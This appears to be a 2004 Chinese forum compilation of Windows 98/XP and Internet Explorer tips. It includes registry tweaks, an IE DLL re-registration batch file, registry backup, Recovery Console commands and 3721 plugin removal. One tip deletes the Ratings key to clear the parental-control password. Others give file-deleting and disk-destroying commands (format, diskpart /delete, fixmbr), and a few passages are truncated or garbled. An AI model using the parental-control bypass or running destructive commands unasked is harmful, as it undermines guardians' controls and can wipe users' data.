    需要注意的是，采用上面的方法修改的是系统默认值，也就是说只有当我们浏览的网站本身没有设置是否显示下划线时，系统才会按上述设置进行显示，若用户浏览的网站自己已经设置了是否显示下划线，IE将会按照相应网站自己的设置进行显示（也就是说此时系统的默认值无效），这点务必引起广大用户的注意！
    四、清除IE历史记录的技巧
    大家都知道，Windows 98具有历史记录功能，它能将用户从事过的各种操作（如查找的内容、运行的程序、浏览的网站）一一记录下来，而后我们再次从是相同操作时就能直接从历史记录中进行检索，从而方便了广大用户的使用。不过任何事情都有两个方面，历史记录尽管可以方便用户的使用，但它也带了泄密的可能，这就要求我们采取适当的方法对这些历史记录进行清除。对于我们使用IE上网所留下的历史记录而言，我们该如何进行清除呢？很简单，启动Windows 98的注册表编辑器并展开HKEY_CURRENT_USER\Software\Microsoft\Inertnet Explorer\TypedURLs分支，该分支就是专门用于保存IE历史记录的，它一共有25条记录，保存了用户最近浏览过的25个网站，我们根据需要对有关记录进行选择性删除即可。
    五、增强IE的自动匹配功能
    许多资深网虫都知道，IE提供的自动匹配功能并不十分完整，它只提供了对".com"、".edu"和".org"等三种后缀的自动匹配功能。而无法对其它后缀（如".gov"、".net"及".com.cn"等）进行匹配，这就影响了用户的使用。那么我们能不能对IE的自动匹配功能进行扩充，使之能自动匹配".gov"、".net"、".com.cn"之类的后缀呢？回答是肯定的，我们只需启动Windows 98的注册表编辑器，并依次展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\UrlTemplate分支，然后就可以在UrlTemplate分支下看到6个分别名为"1"、"2"……"6"字符串值，其键值分别为"www.%s.com"、"%s.com"、"www.%s.edu"、"%s.edu"……等，它们就是用于指定IE自动匹配范围的。广大用户若拟为IE增加新的自动匹配功能，只需在UrlTemplate分支下再新建两个字符串（如"7"和"8"），并将其值分别设置为"www.%s.com.cn"和"%s.com.cn"，然后就能让IE对".com.cn"后缀进行自动匹配。当然我们还可采用此方法增加IE对".gov"、".net"等后缀的自动匹配。

    六、为IE工具栏添加背景图片的技巧
    为美化用户的生活，IE5提供了对系统工具栏中的背景图片进行更换的功能，我们可以利用该功能将自己喜爱的图片设置为IE工具栏的背景，从而使系统变得"个性"十足！不过令人遗憾的时，尽管IE5提供了更换背景图片的功能，但它并没有将该功能公开，我们无法直接对工具栏的背景进行替换，而只能通过对注册表数据库进行修改才能达到目的，具体步骤为：

    1. 准备一张适合作为背景的BMP格式文件（注意，颜色不要太深，否则可能影响工具栏的显示）。
    2. 启动Windows 98的注册表编辑器并依次展开HKEY_Current_User\Software\Microsoft\Internet Explorer\Toolbar分支。
    3. 在Explorer主键下新建一个名为"BackBitmap"的字符串值，并将其值修改为事先准备的BMP图片的完整路径及文件名。
    这样我们就完成了为IE的工具栏添加背景图片的步骤，重新启动计算机之后，其程序窗口的菜单栏及工具栏中就会出现用户选定的图片（Windows 98的资源管理器也会发生同样的变化），效果相当好。
    七、遗忘分级审查密码之后的应急措施
    为防止未成年人接触到网上那些不健康的东西，IE提供了分级审查功能，允许监护人对未成年人可以浏览的网站进行控制，当然这就涉及到一个分级审查的密码问题，我们只有凭借这个密码才能对分级审查的内容进行浏览、修改，假如你不小心忘记了这个密码，那将是一件非常麻烦的事情--你非但不能访问那些受限制的站点，而且不能对已有的限制级别进行更改，这就极大的影响了用户的使用。更严重的是，即使用户重装IE浏览器也无法解决这一难题，这该怎么办呢？难道要重装整个系统吗？当然不是，下面的方法可解除你的苦恼：
    1. 启动Windows 98的注册表编辑器并依次展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings分支。
    2. 此时广大用户就可以从Ratings主键中发现一个名为"KEY"的键值，它就是用于设置IE分级审查口令（数据已经加密），广大用户只需删除该键值即可取消IE的分级审查口令。
    3. 关闭注册表编辑器并重新启动IE浏览器。
    4. 执行"工具"菜单的"Internet选项"命令，打开"Internet选项"对话框。
    5. 单击"内容"选项卡。
    6. 单击"使分级无效"按钮，当提示键入口令时不键入任何字符，直接点击"确定"按钮。
    这样我们就顺利的清除了"分级审查"功能的密码，然后就可以重新进行设置了。
解决IE点击链接后不能打开新窗口问题的方法 http://www.canglou.com/
最近发现我的IE不能打开新窗口，具体表现形式是：用鼠标左键点击超链接没有反应，用鼠标右键点击超链接，在弹出的菜单中选择“在新窗口打开”也没有动静。怎么办呢？经过查找试验，终于找到了解决方法：
    1、在“开始”菜单中打开“运行”窗口，在其中输入“regsvr32 actxprxy.dll”，然后“确定”，接着会出现一个信息对话框“DllRegisterServer in actxprxy.dll succee
ded”，再次点击“确定”。
    2、再次打开“运行”窗口，输入“regsvr32 shdocvw.dll”，“确定”后在出现的信息对话框中点击“确定”。
    3、重新启动Windows，运行IE，随便打开一个网页，点击一个超链接，你会发现IE又能打开新窗口。再试试用鼠标右键选择“在新窗口打开”，问题解决。

打开记事本，把以下文字复制进去，然后保存这个文件，在保存对话框的文件类型中选择所有文件，然后文件名中输入ie.bat。
之后只要双击这个bat文件就可以修复IE的这种问题。
以下是需要复制的内容：
把以下命令行作成一个批处理文件(.bat),然后运行它.

=====batch file for registering all IE dlls========
rundll32.exe advpack.dll /DelNodeRunDLL32 C:\WINNT\System32\dacui.dll
rundll32.exe advpack.dll /DelNodeRunDLL32 C:\WINNT\Catroot\icatalog.mdb
regsvr32 setupwbv.dll
regsvr32 wininet.dll
regsvr32 comcat.dll
regsvr32 shdoc401.dll
regsvr32 shdoc401.dll /i
regsvr32 asctrls.ocx
regsvr32 oleaut32.dll
regsvr32 shdocvw.dll /I
regsvr32 shdocvw.dll
regsvr32 browseui.dll
regsvr32 browseui.dll /I
regsvr32 msrating.dll
regsvr32 mlang.dll
regsvr32 hlink.dll
regsvr32 mshtml.dll
regsvr32 mshtmled.dll
regsvr32 urlmon.dll
regsvr32 plugin.ocx
regsvr32 sendmail.dll
regsvr32 comctl32.dll /i
regsvr32 inetcpl.cpl /i
regsvr32 mshtml.dll /i
regsvr32 scrobj.dll
regsvr32 mmefxe.ocx
regsvr32 proctexe.ocx mshta.exe /register
regsvr32 corpol.dll
regsvr32 jscript.dll
regsvr32 msxml.dll
regsvr32 imgutil.dll
regsvr32 thumbvw.dll
regsvr32 cryptext.dll
regsvr32 rsabase.dll
regsvr32 triedit.dll
regsvr32 dhtmled.ocx
regsvr32 inseng.dll
regsvr32 iesetup.dll /i
regsvr32 hmmapi.dll
regsvr32 cryptdlg.dll
regsvr32 actxprxy.dll
regsvr32 dispex.dll
regsvr32 occache.dll
regsvr32 occache.dll /i
regsvr32 iepeers.dll
regsvr32 wininet.dll /i
regsvr32 urlmon.dll /i
regsvr32 digest.dll /i
regsvr32 cdfview.dll
regsvr32 webcheck.dll
regsvr32 mobsync.dll
regsvr32 pngfilt.dll
regsvr32 licmgr10.dll
regsvr32 icmfilter.dll
regsvr32 hhctrl.ocx
regsvr32 inetcfg.dll
regsvr32 trialoc.dll
regsvr32 tdc.ocx
regsvr32 MSR2C.DLL
regsvr32 msident.dll
regsvr32 msieftp.dll
regsvr32 xmsconf.ocx
regsvr32 ils.dll
regsvr32 msoeacct.dll
regsvr32 wab32.dll
regsvr32 wabimp.dll
regsvr32 wabfind.dll
regsvr32 oemiglib.dll
regsvr32 directdb.dll
regsvr32 inetcomm.dll
regsvr32 msoe.dll
regsvr32 oeimport.dll
regsvr32 msdxm.ocx
regsvr32 dxmasf.dll
regsvr32 laprxy.dll
regsvr32 l3codecx.ax
regsvr32 acelpdec.ax
regsvr32 mpg4ds32.ax
regsvr32 voxmsdec.ax
regsvr32 danim.dll
regsvr32 Daxctle.ocx
regsvr32 lmrt.dll
regsvr32 datime.dll
regsvr32 dxtrans.dll
regsvr32 dxtmsft.dll
regsvr32 vgx.dll
regsvr32 WEBPOST.DLL
regsvr32 WPWIZDLL.DLL
regsvr32 POSTWPP.DLL
regsvr32 CRSWPP.DLL
regsvr32 FTPWPP.DLL
regsvr32 FPWPP.DLL
regsvr32 FLUPL.OCX
regsvr32 wshom.ocx
regsvr32 wshext.dll
regsvr32 vbscript.dll
regsvr32 scrrun.dll mstinit.exe /setup
regsvr32 msnsspc.dll /SspcCreateSspiReg
regsvr32 msapsspc.dll /SspcCreateSspiReg
=====end of batch file for registering all IE dlls========
注册表在IE中的应用技巧
由于各个网友的兴趣、爱好不一样，那么他们在上网时获取的信息也就可能不一样。既然他们获取的信息不同，那么就有可能会用到IE浏览器中的不同设置或命令。为了能够保证高效地使用IE浏览器，我们可以把自己经常使用的这些设置和命令进行重新定制，让IE浏览器更适合自己的浏览风格。现在有许多媒体都对如何进行定制IE作了介绍，但它们介绍的都是通过修改“Internet选项”中的设置，达到定制IE的目的。而笔者今天要向大家介绍的是，通过修改注册表的方法来定制IE浏览器的几个应用。
1、改变IE窗口的动感效果
如果我们希望在打开或者关闭IE窗口时，被打开的窗口有动感效果，可以按照下面的步骤来修改注册表：首先打开注册表编辑器操作窗口，在该窗口中用鼠标依次单击键值HKEY_ CURRENT_USER / Control Panel/ desktop / WindowMetrics键值，并在右边的窗口中新建串值"Minanimat"与"Maxanimat"并设值为"0"，为"1"，这样在IE窗口最大最小化切换时有递变的效果。
2、更改IE浏览器中的安全口令
    我们可以在 IE浏览器的“ Internet 选项”对话框的“内容”选项页的“分级审查”框中设置口令，这样，在显示有 ActiveX 的页面时，总会出现“分级审查不允许查看”的提示信息，然后弹出口令对话框，要求您输入监护人口令。如果口令不对，则将停止浏览。但是，如果此口令遗忘了，则无法浏览这些特征的页面。在口令遗忘后，重装 IE浏览器也无法去掉安全口令。这时只有求助于注册表了：打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPolicies 分支，在 Policies 子键下选择“ Ratings ”子键，按 Del 键将其删除，由于 Ratings 子键下的 Key 键值数据就是经过加密后的口令，删除了这一项， IE浏览器自然就认为我们没有设置口令了。
3、更改IE的默认下载目录
    大家如果经常用IE在网上下载文件就会知道，浏览器程序默认地会将下载内容存放?quot;C:WINDOWSDesktop"目录中，也就是放到Windows桌面上，时间一长就会将桌面搞得乱七八糟！有的用户为了保持桌面的整洁，同时希望能够有效地管理下载下来的文件，他们需要更改IE的默认下载目录，将其改为某个专门的下载文件夹，例如"C:download"目录中。为此，我们只需启动Windows 98的注册表编辑器，并在编辑器窗口中用鼠标依次展开HKEY_CURRENT_USER \Software\Microsoft\Internet Explorer键值，此时我们就可以在Internet Explorer键值下发现一个名为"DownLoad Directory"的字符串值，其默认值为"C:WINDOWSDesktop"。它就是用于定义IE默认文件下载路径的，我们只需对其进行适当修改，例如将其改为"C:download"，此后再使用IE直接下载文件时，系统就会将文件直接保存到"C:download"目录中了。
4、修改IE5.0的搜索引擎
    在注册表中依次展开“HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerSearch”，在右侧窗口中把“CustomizeSearch”、“SearchAssistant”改为我们定义的搜索引擎，如 www.canglou.com
以后当我们每次点IE5.0的搜索引擎时，即可自动调出我们定义的搜索引擎，如上面设定的藏陋网.
5、删除IE页面下的下划线
    当我们打开一个IE页面时，会发现在超级链接下方有一划线，这主要是让用户更加容易分清超级链接与普通文本的区别。但有时我们为了达到某个版面效果，不希望看到在这些超级链接下有划线，而希望取消它们，这也是非常容易办到的！事实上，IE同时为下划线提供了三种不同的显示状态，它们分别是"始终显示下划线"、"始终不显示下划线"和"将鼠标放到超级链接上面的时候显示下划线"，广大用户完全可根据自己的需要对其加以调整。具体来说，我们若拟对IE是否显示超级链接的下划线进行设置，则应启动Windows 98的注册表编辑器并依次展开HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main分支，然后就可以看到一个名为"Ancher Underline"的字符串值，它就是用于设置是否显示超级链接的下划线的。当其值为NO时表示始终不显示下划线、为YES时表示始终显示下划线、为HOVER则表示通常不显示下划线，而将鼠标放到相应超级链接下面之后显示下划线，广大用户只需根据自己的需要加以更改即可。
    需要注意的是，采用上面的方法修改的是系统默认值，也就是说只有当我们浏览的网站本身没有设置是否显示下划线时，系统才会按上述设置进行显示，若用户浏览的网站自己已经设置了是否显示下划线，IE将会按照相应网站自己的设置进行显示。
6、定制IE浏览器的地址
    用过IE的人都遇到过“取消操作”提示，还有“Web页不可脱机使用”，“警告：网页已经过期”等情况，但是我们有没有注意到出现提示页时地址栏中显示的是什么，URL为“about :xxxxxxx”。about是除了“http”、“ftp”、“mailto”、“gopher”外的特殊协议，利用它可以使用别名调阅特定的网页，比如IE的空白页，则的URL栏中打入about :blank即可，blank即为空白页的别名。
    利用这可通过创建类似的别名，指向我们指定的网页地址，在注册表中依次展开“HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerAboutURLs”，在右侧窗口中单击鼠标右键，从弹出的快捷菜单中，选择“新建”、“串值”，然后将“新值#1”更名为我们要给指向的网页（网址）取的名字，右击该名字，再将其值设置为我们想要指向的网址，注意不能省了“ http://”/ 。
  我们也可以用此法给硬盘上常用网页取个别名，填上路径即可方便打开了。
7、让IE显示超级链接的完整地址
    我们知道，在使用IE浏览某个网页时，只需将鼠标放到某个超级链接的下面，系统就会在状态栏中显示出该超级链接的地址，不过系统默认显示的是相对地址（跟我们在DOS中使用的相对路径差不多），这在某些情况下可能并不能满足广大用户的需要。别着急，我们只需启动Windows 98的注册表编辑器，然后在注册表编辑器窗口中用鼠标依次展开HKEY_CURRENT_USER\ Software\Microsoft\ Internet Explorer键值，此时我们会在右边的窗口中发现一个名为"Show_FullURL"的Dword值，它就是用于设置是否在IE状态栏上显示超级链接地址的，我们只需将其由0改为1，IE就会在状态栏上显示出相应超级链接的绝对地址，从而满足了广大用户的需要。
8、增加IE的自动识别功能
    经常上网的朋友知道，我们要访问形如www.aaa.com 这样的网站时，只要在?..]www.aaa.com.cn 这样的网站就没那么方便了，因为IE未包含.cn后缀的自动连接功能。那么我们能不能对IE的自动匹配功能进行扩充，使之能自动匹配[/url]".gov"、".net"、".com.cn"之类的后缀呢？回答是肯定的，我们只需启动Windows 98的注册表编辑器，并依次展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\UrlTemplate分支，然后就可以在UrlTemplate分支下看到6个分别名为"1"、"2"……"6"字符串值，其键值分别为"www.%s.com"、 "%s.com"、"www.%s.edu"、 "%s.edu"……等，它们就是用于指定IE自动匹配范围的。广大用户若拟为IE增加新的自动匹配功能，只需在UrlTemplate分支下再新建两个字符串（如"7"和"8"），并将其值分别设置为"www.%s.com.cn" 和"%s.com.cn"， 然后就能让IE对".com.cn"后缀进行自动识别。当然我们还可采用此方法增加IE对".gov"、".net"等后缀的自动识别。
9、防止他人获取对Web页面的访问信息
    大家都知道，Windows 98具有历史记录功能，它能将用户从事过的各种操作（如查找的内容、运行的程序、浏览的网站）一一记录下来，而后我们再次从是相同操作时就能直接从历史记录中进行检索，从而方便了广大用户的使用。不过任何事情都有两个方面，历史记录尽管可以方便用户的使用，但它也带来了泄密的可能，有些不法用户就会利用这些记录来获取我们已经访问过的Web页面信息。为保证绝对安全，我们就需要采取适当的方法对这些历史记录进行清除。对于我们使用IE上网所留下的历史记录而言，我们该如何进行清除呢？很简单，启动Windows 98的注册表编辑器并展开HKEY_CURRENT_USER\Software\Microsoft\Inertnet Explorer\TypedURLs键值，该键值就是专门用于保存IE历史记录的，它一共有25条记录，保存了用户最近浏览过的25个网站，我们根据需要对有关记录进行选择性删除即可。
10、为IE的工具栏添加背景
    为了愉悦网友的视线，IE5提供了对系统工具栏中的背景图片进行更换的功能，我们可以利用该功能将自己喜爱的图片设置为IE工具栏的背景，从而使系统变得"个性"十足！不过令人遗憾的时，尽管IE5提供了更换背景图片的功能，但它并没有将该功能公开，我们无法直接对工具栏的背景进行替换，而只能通过对注册表数据库进行修改才能达到目的，具体操作步骤为：首先准备一张适合作为背景的BMP格式文件，并且该图象的颜色不能太深，否则可能影响工具栏的显示效果；接着打开注册表编辑器操作窗口，并在该窗口中依次展开HKEY_Current_User\ Software\Microsoft\Internet Explorer\Toolbar键值；随后在Explorer主键下新建一个名为"BackBitmap"的字符串值，并将其值修改为事先准备的BMP图片的完整路径及文件名；这样我们就完成了为IE的工具栏添加背景图片的步骤，重新启动计算机之后，其程序窗口的菜单栏及工具栏中就会出现用户选定的图象。
11、更改Outlook Express 信箱存放路径
    如果我们想修改Outlook Express 信箱存放路径，可以在HKEY_CURRENT_USERIdentities{4C44D002-7BCF-11D3-9957-AB53DA238B0C}SoftwareMicrosoftOutlook Express5.0下修改“Store Root”字符串值为要修改的路径。
修复IE6.0中文正式版中的bug
IE6.0中文正式版有一个小小的Bug，虽然这个Bug不会影响正常使用，但是却会影响使用的方便性。这个Bug表现在当你在IE的地址栏中输入目标网址，比如“sohu”，然后按动Ctrl+Enter，在正常情况下，IE应该自动匹配完成输入网址www.sohu.com，并开始访问该网址，但?..dows\system下。

    工具介绍：eXeScope是一个可以修改软件资源的工具，功能强大。eXeScope能在没有资源文件的情况下分析、显示不同的信息，重写可执行文件的资源，包括菜单、对话框、字串表等，是汉化外文软件的常用工具，文件大小544KB，汉化版下载地址为：http://newhua.ruyi.com/down/EXESC630.ZIP。
IE6.0中文正式版有一个小小的bug。虽然这个bug不会影响正常使用，但是却会影响使用的方便性。bug体现在当你想使用自动添加“www.”和“.com”功能的时候。系统添?..L文件就可以了。
首先复制C:\windows\system\browselc.dll文件到一个文件夹里面，然后用eXeScope打开这个文件，找到“资源”－“字串表”下的809字，打开找到12936，把“12936,http://www.%s.co.cn”改为“12936,ht...哺恰Ｇ屑乔屑牵?/a>
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:15　　 标题: 整理了七个小时的东东！[申请加精]

十二。★★★注册表备份和恢复
1:手工备份Windows的注册表
在9X/Me中
方法一:在9X/Me系统中我们要备份的是System.dat和User.dat这两个文件，我们可以把它们复制到硬盘的某个分区或目录，当然也可以复制到软盘上做备份。（本人建议大家复制到某个分区，因为放到目录中恢复时要走的“路”长--麻烦；放到软盘又由于现在的软盘太不保险了，动不动就让你读不出，还有有时候文件过大复制到一张软盘就有困难了，所以还是复制到某个分区备份！）恢复的方法很简单直接将这俩文件覆盖到C:\Windows就可以了！不过在备份和恢复的时候我们要首先对这两个文件的只读和隐藏的属性进行修改。具体方法：在资源管理器中找到这两个文件（首先我们要在“文件夹选项...”--“查看”点选“显示所有文件夹和文件”--“确定”让它们显示出来！），用鼠标右键点击文件，然后选择“属性”，将“只读”和“隐藏”前的勾去掉，“确定”就可以了！我们备份好后可要把“只读”和“隐藏”前的勾还给它！（为了防止中毒！）

方法二:在Windows 9X/me中我们可以通过一个系统自带的程序来备份，操作它可方便多了！方法如下：1；“开始”--“程序”--“附件”--“系统工具”，单击“系统信息”--“工具”--“注册表检查程序”。2；“开始”--“运行”输入“scanregw.exe”。运行程序后，当系统问你是否要备份时，你选“是”，然后系统就会生成一个.cab的文件。为了防止被覆盖我们可以给它一个特别的名字（这个就你自己取了！ 还有一点建议：这个备份比较简单也在Windows界面中我们就用起来很方便，所以一般呢我们就用在安装一些软件前备份的，有很多人都碰见安装了一个程序后系统出毛病了；比如启动不了，常死机，机器运行不稳定等。我们就可以用这个备份的注册表程序来恢复了!）

方法三:在DOS下备份。我们可以利用DOS下的Scanreg.exe程序备份Windows的注册表。其实用这个程序来备份注册表，比第一种的手工备份更适合与初级用户。我们可以利用启动盘启动到DOS，然后输入命令“scanreg”，我们将看见一个界面，不管它写了什么，选“Start”就开始了对注册表的检查了，检查后又有个画面给出了三个选项“Create Backups（创建备份）”、“View Backups（察看备份文件）”、“Exit（这个就不用说了吧）”。我们要备份所以就选“Create Backups（创建备份）”，程序自动创建备份文件。备份好后就“OK"”了，界面跳回！我们可以来察看一下自己的备份注册表文件选“View Backups（察看备份文件）”，就可以看见我们备份的文件的，包含有备份时间以及是否启动过的信息！

在2000/xp中
在2000/xp中可没像Scanreg.exe这样的程序给我们，我们需要使用“注册表编辑器”进行导出导入的操作来实现备份和恢复注册表！
具体方法：“开始”--“运行”输入“regedit”然后打开了“注册表编辑器”我们选“文件”--“导入”/“导出”
除了以上的几种方法后我们还可以通过其它的软件来帮助我们备份系统，比如“超级魔法兔子”、“Windows优化大师”、“Tweak”等；这些软件的方法在这里就不讲了！

2：手工恢复注册表
●恢复2000/Xp的注册表文件，除了前文讲的导出/导入。其实我们还可以在启动2000/Xp时恢复注册表。具体方法是在启动计算机看见“正在启动2000/xp”的信息后，按F8键。然后在出现的界面中选择“最后一次正确的配置”然后回车，启动系统，操作完毕后，注册表将被还原到上次成功启动计算机的时候的状态！
●恢复98/Me下的注册表文件，在每次启动系统的时候“注册表检查程序”都会自动扫描注册表。如果它发现注册表有问题，就会重新启动计算机，将自动用备份副本替换注册表！

这里我们主要讲的是在Dos下如何恢复注册表!
我们用启动盘启动到dos方法跟前文的方法三一样，只是我们不“Create Backups（创建备份）”而是直接“View Backups（察看备份文件）”然后选好一个备份文件选“Restore（还原）”，即可恢复注册表，还原成功后系统提示重新启动计算机，那就重新启动吧！
如果你只是想在DOS中恢复原来的注册表备份文件，那直接执行“scanreg /restore”更直接更快！
以上的方法基本是可以还你一个比较如意的注册表了！但是如果你备份的注册表和系统自己备份的5个备份文件都派不上用场了，而且Windows也进不了了！（比如不小心都被覆盖了！或者受到了严重的损坏！或中毒了！）这下我们应该如何呢？对于是Windows 9X/Me系统的用户来说除了重新安装系统最好的方法就是用System.1st文件来恢复了！别慌，我们先来认识一下System.1st，系统初次安装成功时，会在系统盘的根目录下（一般是C:\）自动创建一个原始注册表的备份，其文件名为System.1st，这个文件具有系统、隐藏、只读属性。所以我们用个文件来替换目前有错误或损坏的注册表文件System.dat，在重新启动后就会出现9X/Me标准安装界面，不过这是在快要结束安装时的硬件检测步骤，一般只要几分种就可完成系统的重新安装！
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:16　　 标题: 整理了七个小时的东东！[申请加精]

十三。★★★详细的xp修复控制台命令
放入xp（2000）的光盘，安装时候选R，修复！
Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。
    Bootcfg
    bootcfg 命令启动配置和故障恢复（对于大多数计算机，即 boot.ini 文件）。
    含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。
    用法：
    bootcfg /default　　设置默认引导项。
    bootcfg /add　　　　向引导列表中添加 Windows 安装。
    bootcfg /rebuild　　重复全部 Windows 安装过程并允许用户选择要添加的内容。
    注意：使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份 boot.ini 文件。
    bootcfg /scan　　　 扫描用于 Windows 安装的所有磁盘并显示结果。
    注意：这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。
    bootcfg /list　　　列出引导列表中已有的条目。
    bootcfg /disableredirect 在启动引导程序中禁用重定向。
    bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]
    在启动引导程序中通过指定配置启用重定向。
    范例：
bootcfg /redirect com1 115200
bootcfg /redirect useBiosSettings
    hkdsk
    创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。
    含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。
    vol [drive:] [ chkdsk [drive:] [/p] [/r]
    参数　　无
    如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。
drive: 指定要 chkdsk 检查的驱动器。
/p　　 即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱动器做任何更改。
/r　　 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。
    注意
Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录（默认为 \%systemroot%\System32）中找到该文件，将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。
Diskpart
    创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。
    diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]
    参数 无
    如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。
    /add
    创建新的分区。
    /delete
    删除现有分区。
    device_name
    要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称：
    \Device\HardDisk0
    drive_name
    以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例：
    D:
    partition_name
    以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例：
    \Device\HardDisk0\Partition1
     大小
    要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。
    范例
    下例将删除分区：
diskpart /delete \ Device\ HardDisk0\ Partition3
diskpart /delete F:
    下例将在硬盘上添加一个 20 MB 的分区：
    diskpart /add \ Device\ HardDisk0 20
    Fixboot
    向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时，才能使用 fixboot 命令。
    fixboot [drive]
    参数　　驱动器
    将要写入引导扇区的驱动器。它将替代默认的驱动器（即用户登录的系统分区）。例如，驱动器：D:
    范例
    下列命令范例向驱动器 D: 的系统分区写入新的分区引导扇区：
    fixboot d:
    注意: 如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。
    Fixmbr
    修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。
    fixmbr [ device_name]
    参数
    device_name
    要写入新的主引导记录的设备（驱动器）。设备名称可从 map 命令的输出获得。例如，设备名称：
    \Device\HardDisk0
    范例
    下列命令示例向指定设备写入一个新的主引导记录：
    fixmbr \Device\HardDisk0
    注意
如果不指定 device_name，新的主引导记录将被写入引导设备，即装载主系统的驱动器。
如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。
    Format
    将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。
    format [ drive:] [ /fs:file-system]
    参数
    drive:
    指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。
    /q
    对驱动器进行快速格式化。不扫描驱动器看是否有坏区域，因此只应对以前格式化过的驱动器使用该参数。
    /fs:file-system
    指定要使用的文件系统：FAT、FAT32 或 NTFS 。如果未指定文件系统，将使用现有的文件系统格式。
    Map
    显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。
    map 命令仅在使用故障恢复控制台时才可用。
    Map [ arc]
    参数
    arc
    指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例：
    multi(0)disk(0)rdisk(0)partition(1)
    等价的设备名称是：
    \Device\HardDisk0\Partition1
    范例
    下例将物理设备名映射为使用 ARC 设备名称的驱动器号：
    map arc
    注意
如果不使用 arc 参数，则 map 命令显示设备名称。
map 命令还显示文件系统的类型和每个磁盘的大小（MB）。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:17　　 标题: 整理了七个小时的东东！[申请加精]

十四。★★★3721如何彻底关闭

关于3721的彻底清除
这个3721网络实名插件是使用Rundll32.exe调用连接库的，系统无法终止Rundll32.exe进程，所以我们必须重新启动计算机，按 F8 进入安全模式（F8 只能按一次，千万不要多按！）
    之后，单击 开始 -> 运行 regedit.exe 打开注册表，进入：
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除键：CnsMin
其键值为：Rundll32.exe C:WINNTDOWNLO~1CnsMin.dll,Rundll32
（如果是win98，这里的 C:WINNTDOWNLO~1 为 C:WINDOWSDOWNLO~1）
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerAdvancedOptions
删除整个目录：!CNS
这个目录在 Internet 选项 -> 高级 中加入了3721网络实名的选项。
HKEY_LOCAL_MACHINESOFTWARE3721 以及 HKEY_CURRENT_USERSoftware3721
删除整个目录：3721
注：如果您安装了3721的其它软件，如“极品飞猫”等，则应删除
整个目录：HKEY_LOCAL_MACHINESOFTWARE3721CnsMin
    以及　HKEY_CURRENT_USERSoftware3721CnsMin
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
删除键：CNSEnable 其键值为：a2c39d5f
删除键：CNSHint 其键值为：a2c39d5f
删除键：CNSList 其键值为：a2c39d5f
    在删除完注册表中的项之后，还需要删除存储在硬盘中的3721网络实名文件。
    删除如下文件：
    C:WINNTDOWNLO~1 目录下
    （如果是win98，这里的 C:WINNTDOWNLO~1 为 C:WINDOWSDOWNLO~1 下同）
2001-08-09 15:34
3721
2001-08-02 17:03 40,960 cnsio.dll
2001-08-08 14:14 102,400 CnsMin.dll
2001-08-24 23:14 42 CnsMin.ini
2001-08-09 10:18 13,848 CnsMinEx.cab
2001-07-06 17:57 32,768 CnsMinEx.dll
2001-08-25 02:52 115 CnsMinEx.ini
2001-08-25 02:51 17,945 CnsMinIO.cab
2001-08-02 17:02 32,768 CnsMinIO.dll
2001-08-24 23:15 40,793 CnsMinUp.cab
C:WINNTDOWNLO~13721 目录下
2001-08-02 17:03 40,960 cnsio.dll
2001-08-24 15:53 102,400 CnsMin.dll
2001-07-06 17:59 213 CnsMin.inf
2001-08-24 15:48 28,672 CnsMinIO.dll
    以上文件全部删除，这样3721网络实名“病毒”就从您的计算机中全部清除了。
    最后，重新启动计算机，进入正常模式。现在已经完全没有3721网络实名的困扰了！
巧用HOSTS文件屏蔽3721
很多人不喜欢3721功能，但是又觉得卸载很困难，利用下面这个办法，可以解决你的忧虑。
